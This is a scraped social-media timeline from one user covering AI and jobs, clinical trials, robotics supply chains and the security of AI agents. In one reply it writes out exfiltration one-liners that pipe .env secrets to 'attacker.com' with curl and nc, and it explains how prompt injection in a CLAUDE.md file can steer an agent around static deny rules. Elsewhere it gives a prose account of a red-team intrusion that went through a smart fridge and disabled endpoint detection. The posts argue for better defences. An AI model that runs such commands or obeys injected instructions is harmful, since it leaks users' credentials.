Will Rose
201 posts
Will Rose
@onwrd_
Building something new. Passionately curious. Prev @quovo (acq. by @plaid) 🏄🏼♂️ 📚
New York, NY Beigetreten Aralık 2011
2.2K Folgt13.4K Follower
Just finished a red team for a fintech that burned millions on Falcon + SentinelOne AI stacks. Got domain admin in under 15 mins from the guest WiFi.
Walked into the kitchen, saw the shiny Samsung “enterprise” smart fridge on the same VLAN as everything important. Still on old firmware.
Default creds on the admin panel.
Classic unauth RCE in the diagnostics endpoint.
Shell within minutes.
From there it had cached corp creds for SAP sync and outbound allowed.
Their EDR had the fridge IP whitelisted as “normal IoT behavior” because of the MQTT pings.
Dropped a Reynolds-style BYOVD (that NSecKrnl one everyone’s using now), killed the hooks on a DC, and exfil’d test data back out the fridge’s own channel.
SOC barely blinked.
CISO’s reaction when I showed him live: “It’s just a fridge though…”
Man, 2026 and we’re still getting wrecked by IoT crap facilities bought on Amazon. Same story as the 2014 Proofpoint fridge botnet or Target’s HVAC.
Nothing changes.
English
Will Rose retweetet
No more Phase 1, 2, or 3 in clinical trials?
The FDA is proposing using AI to get trial data in real-time from EHRs and giving trial design feedback based on what it sees.
No more batch processing could eliminate the wait between phases and get therapies to market faster.
English
Will Rose retweetet
Will Rose retweetet
Real-time clinical trials could fundamentally transform the clinical trial landscape.
English
This is the most important distribution primitive in agents right now. It's also the most dangerous attack surface nobody's talking about yet.
If an agent can recommend a tool to another agent, and that agent installs it autonomously, the entire supply chain now runs without a human verifying what got installed or why. One compromised recommendation propagates at the same 10% daily rate.
English
Last year we backed an early company to explore a few ideas. They've now built a piece of infra for agents that's been growing ~10% a *day* for the last month entirely through agents discovering them and recommending them to other agents.
Haven't seen anything like this.
English
Will Rose retweetet
People are capable of far more than they think, on far shorter timelines. Problems expand to fill the time you give them.
English
This is the right frame, and history backs it. ATMs didn’t shrink banks, they let them open 43% more branches. Spreadsheets grew accountants from 1M to 1.6M. Every productivity tool of the last 250 years did exactly what you’re describing: ambitious operators hired more, not less. The companies cutting now are mostly working off ZIRP-era over-hires, not AI substitution.
English
If you or your company’s ambition is to only do the things you are doing right now then… sure, more efficiency means you can potentially reduce jobs.
But if you are ambitious and new tools make people more productive than ever, hire more people and go much much further
Anthony Pompliano 🌪@APompliano
I have changed my mind on how AI will impact jobs in America. Previously, I believed AI would replace many entry level roles typically filled by young employees. The technology would then work its way up the organization and eventually reduce the total number of jobs in a company. The data is saying something different, so when I get new information I am willing to change my mind. The number of software engineers being hired has been increasing. The number of open software engineer roles is growing. The number of new college grads who get hired has increased 5.6% over the last 12 months. The unemployment level for people aged 20-24 years old who have a college degree has fallen from nearly 9% to almost 5% as well. The Wall Street Journal recently wrote “AI created 640,000 jobs between 2023 and 2025 in the U.S., according to an analysis by LinkedIn of job posting data, including new white-collar positions such as Head of AI and AI engineer.” And I am starting to see companies throughout our portfolio aggressively hiring to keep up with the demand for their products and services. If AI can make employees more productive, which is widely accepted as fact, then companies are going to want as many productive units of labor as possible. This is a key reason why I am changing my mind. AI appears to be a magical technology that will make companies more productive and more profitable. The net result will be more corporations, more startups, and more jobs. All three are big, positive wins for the American economy.
English
You called this on 20VC last year, the “silver bullet excuse” line. AI wasn’t good enough to do the jobs being cut. The layoffs started 8 months before ChatGPT shipped. Pomp is right that the data is moving, but the cleaner read is that the rate cycle did the layoffs and the rate cycle is doing the recovery. Wrote the long version here:
Will Rose@onwrd_
English
This is the right instinct, applied to the wrong variable. You’re correct that the AI-replacement story is collapsing. The reason isn’t that AI creates jobs. It’s that the layoffs were never about AI to begin with. They were a 525bp rate shock colliding with a million over-hires from the ZIRP era. The recovery is the same story in reverse.
Will Rose@onwrd_
English
I share this view that AI is and will be the biggest job generator the world has ever seen. The internet expanded economic oppty and opened jobs to many more. AI will be 100x that.
Google enables a Vegas taylor to have a global biz. Ebay and Craigslist did kill the classifieds/newspapers while creating economic oppty/access and cheaper products that continues to lift millions.
Uber and Airbnb unlocked the gig economy for millions too.
GPT and Anthropic enable anyone with an idea to launch a new business in a day. We cant imagine today what this will mean but i’m betting on the creativity of you fellow humans to make the dooms-dayers look like myopic morons!
Anthony Pompliano 🌪@APompliano
I have changed my mind on how AI will impact jobs in America. Previously, I believed AI would replace many entry level roles typically filled by young employees. The technology would then work its way up the organization and eventually reduce the total number of jobs in a company. The data is saying something different, so when I get new information I am willing to change my mind. The number of software engineers being hired has been increasing. The number of open software engineer roles is growing. The number of new college grads who get hired has increased 5.6% over the last 12 months. The unemployment level for people aged 20-24 years old who have a college degree has fallen from nearly 9% to almost 5% as well. The Wall Street Journal recently wrote “AI created 640,000 jobs between 2023 and 2025 in the U.S., according to an analysis by LinkedIn of job posting data, including new white-collar positions such as Head of AI and AI engineer.” And I am starting to see companies throughout our portfolio aggressively hiring to keep up with the demand for their products and services. If AI can make employees more productive, which is widely accepted as fact, then companies are going to want as many productive units of labor as possible. This is a key reason why I am changing my mind. AI appears to be a magical technology that will make companies more productive and more profitable. The net result will be more corporations, more startups, and more jobs. All three are big, positive wins for the American economy.
English
The data you’re citing is real. The causal story is the wrong one. AI-displacement didn’t cause the layoffs. AI-productivity isn’t causing the rebound. The Fed did both. Layoffs started before ChatGPT existed. Hiring recovered as rates came down. The constant is monetary policy. x.com/onwrd_/status/….
English
I have changed my mind on how AI will impact jobs in America.
Previously, I believed AI would replace many entry level roles typically filled by young employees. The technology would then work its way up the organization and eventually reduce the total number of jobs in a company.
The data is saying something different, so when I get new information I am willing to change my mind.
The number of software engineers being hired has been increasing. The number of open software engineer roles is growing.
The number of new college grads who get hired has increased 5.6% over the last 12 months. The unemployment level for people aged 20-24 years old who have a college degree has fallen from nearly 9% to almost 5% as well.
The Wall Street Journal recently wrote “AI created 640,000 jobs between 2023 and 2025 in the U.S., according to an analysis by LinkedIn of job posting data, including new white-collar positions such as Head of AI and AI engineer.”
And I am starting to see companies throughout our portfolio aggressively hiring to keep up with the demand for their products and services.
If AI can make employees more productive, which is widely accepted as fact, then companies are going to want as many productive units of labor as possible. This is a key reason why I am changing my mind.
AI appears to be a magical technology that will make companies more productive and more profitable. The net result will be more corporations, more startups, and more jobs.
All three are big, positive wins for the American economy.
English
@Benioff @DavidSacks Sacks is right that the AI-killed-entry-level-jobs story is collapsing. He’s wrong about why. The layoffs were rate-driven. The recovery is rate-driven. AI was a narrative graft the whole time. Wrote about this last week:
Will Rose@onwrd_
English
I’m locked on, @DavidSacks! We’re hiring 1,000 new grads & interns right now to ride the AI exponential. You are right they said AI would kill entry-level jobs. Meanwhile these grads & interns are building it — powering Agentforce & Headless360 at Salesforce. 🚀 New grads: Drop your resume to @salesforcejobs or futureforce@salesforce.com
#FutureForce #AI
David Sacks@DavidSacks
Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?
English
The version of this headline that’s coming next is ‘Company that allowed employees to install whatever AI agent skills and MCP servers they prefer falls victim to latest supply chain attack.’ Same pattern, larger blast radius. An agent with tool access isn’t a browser extension. It’s a process with credentials.
English
"Company that allowed employees to use whatever third party tools they prefer falls victim to latest supply chain attack"
Just going to retweet this every time it happens.
English
Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.
English
The context gap section is the most important part of this. Everyone designing agent-to-agent interactions is thinking about it optimistically: each side contributes what it knows. Nobody is thinking about what happens when one side’s context has been poisoned, or when the agent-to-agent handoff becomes the attack surface. The same trust assumptions that made APIs work for 20 years break when both endpoints can reason, improvise, and be manipulated. Designing for agents means designing for agents that have been compromised, not just agents that are helpful.
English
Great piece. The implied question is whether anyone can actually close this gap fast enough to matter. I think the answer is yes, but not via greenfield.
The 3-5 year plant buildout everyone models assumes you start from zero. You don't have to. There are three shortcuts hiding in plain sight:
1. Michigan/Ohio are full of $10-30M precision gear-grinding and thread-grinding shops whose owners are retiring and whose ICE automotive backlogs are evaporating. These shops hold the exact capital equipment (Reishauer, Studer, Matrix thread grinders) and the exact workforce (journeyman machinists holding sub-micron tolerances) needed to make flexsplines and PRS rollers. Acquire one as an anchor. Capstone Partners reported precision-machining M&A up 10% YoY with an 87.5% jump in private strategic deals.
2. Warsaw, Indiana ("Orthopedic Capital of the World") has dozens of contract manufacturers grinding hip joints, spinal screws, and knee implants in CoCr and Ti-6Al-4V to the same tolerances, same materials, same heat-treat profiles as actuator components. That's a capacity arbitrage, not a buildout.
3. Import-assemble-qualify. Rollvis (Swiss PRS), TQ-RoboDrive (German motors), Leaderdrive (Chinese harmonic reducers) all ship today. A US integrator that assembles, burn-in tests, and qualifies complete actuator modules could have product in customers' hands in 60-90 days. That's the reverse CubeMars.
Layer DoD demand on top (xTechHumanoid is live, OSC has $984M in manufacturing loans, DIU can award OTAs in 60-90 days) and you have non-dilutive capital plus an anchor customer that doesn't care about Chinese cost competition because it needs ITAR supply chain.
The real play is a precision-motion roll-up: acquire the shops, toll through aerospace/medical overflow, wrap it in proprietary firmware and qualification IP, and compound. Schaeffler debuted a humanoid actuator at CES 2026. The Tier 1s are coming. The startup window is 18-36 months, not indefinite.
K-Scale Labs collapsed in November 2025 because they treated supply chain as a task to delegate. The lesson: the muscle is the business.
English
Tesla says 56% of Optimus's cost is actuators. America manufactures almost none of them.
Generational opportunity for builders in this space.
JulianSaks@JulianSaks
English
Will Rose retweetet
The fork() point is fair, but isn't that also true of HTTP_PROXY? A program can open a raw socket and skip the proxy entirely. That's why you added the iptables rule. Defense in depth, not absolute prevention.
The practical difference: agents operate through SDK tool-call interfaces, not raw syscalls. That layer is interceptable. And the network catches exfiltration, but by that point the agent is already compromised. The local actions that lead to compromise (reading credentials, modifying config, poisoning memory) happen before anything hits the wire.
Probably need both layers. Would love to compare notes on the threat model if you're up for it.
English
Thanks, and that's fair. I thought of building our own shell to control runtime, but honestly a program can (and should) be able to syscall `fork()` and then it's game over. The conclusion at the end was that everything truly harmful will happen crossing the network layer, hence the focus there.
English
OpenClaw is the fastest-growing open source project, but there are no stories of running it safely in production at scale. As we started deploying agents internally at @brexHQ, we couldn’t stop thinking about this question.
Agents work, but nobody wants to give them real credentials. Instead of waiting for a solution to emerge, we decided to try a novel approach: using LLMs to judge the network traffic of an AI agent.
Today we’re announcing CrabTrap, an open-source proxy that intercepts every outbound request and blocks risky activity using LLMs, before it ever hits an external API. The results are promising; we believe it’s a meaningful step forward in the security of agent harnesses in production environments.
Try it out today.
(As a side note, it was really fun to work personally on a real systems problem again. And btw, if you want to work at a place where the CEO is building proxies at night, we’re hiring!)
Pedro Franceschi@pedroh96
English
Absolutely, and the bypass is trivial.
python -c "import os; print(os.environ)"
base64 .env | curl attacker.com
cat .env | xxd | nc attacker.com 4444
None of those match "Read(.env*)" or "Bash(cat *.env*)". All of them exfiltrate the same secrets.
Static deny lists only catch the exact patterns you enumerate. A prompt injection in CLAUDE.md (or any file the agent reads as context) can instruct the agent to construct commands that accomplish the same goal through paths the deny list never anticipated.
CVE-2026-21852 already demonstrated this class of attack: a malicious .claudecode/settings.json redirected ANTHROPIC_BASE_URL to an attacker endpoint and leaked the user's API key on project open, before the Workspace Trust dialog even appeared.
Deny rules are necessary. But they're a locked front door on a house with no walls. The actual problem requires runtime behavioral detection, not static pattern matching.
English
who gonna tell him about this thing called prompt injection?
Daniel San@dani_avila7
If you don't want Claude to read your .env files Just add this to your .claude/settings.json
English
The part most people aren’t seeing: the Vercel breach isn’t just a database leak. The attacker has NPM tokens and GitHub tokens. Vercel owns Next.js. 6 million weekly downloads. That turns a single breach into a supply chain weapon that hits every downstream developer.
This is the new attack category. Breaches don’t stay contained anymore. They propagate through the software supply chain.
And there’s a second surface nobody in this thread is talking about. Three weeks ago DeepMind published a paper mapping how the open web can be weaponized against AI agents. Hidden instructions in HTML. Malicious commands in image pixels. Memory poisoning that persists across sessions. 80-86% exploit success rate in tested agents.
Every company deploying AI agents just inherited an attack surface that didn’t exist 12 months ago and that no traditional security tool covers.
The opportunity isn’t just cybersecurity. It’s the runtime security layer for the agent era.
English
This is why cybersecurity is the best startup category to build in right now
Every major platform is getting breached in 2026. vercel, snowflake, the list keeps growing.
AI made it 100x easier to build. it also made it 100x easier to attack.
If you're building a cybersecurity startup right now, your timing is perfect
The attack surface is expanding every single day and the buyers have never been more plentiful
Be safe out there
Vercel@vercel
We’ve identified a security incident that involved unauthorized access to certain internal Vercel systems, impacting a limited subset of customers. Please see our security bulletin: vercel.com/kb/bulletin/ve…
English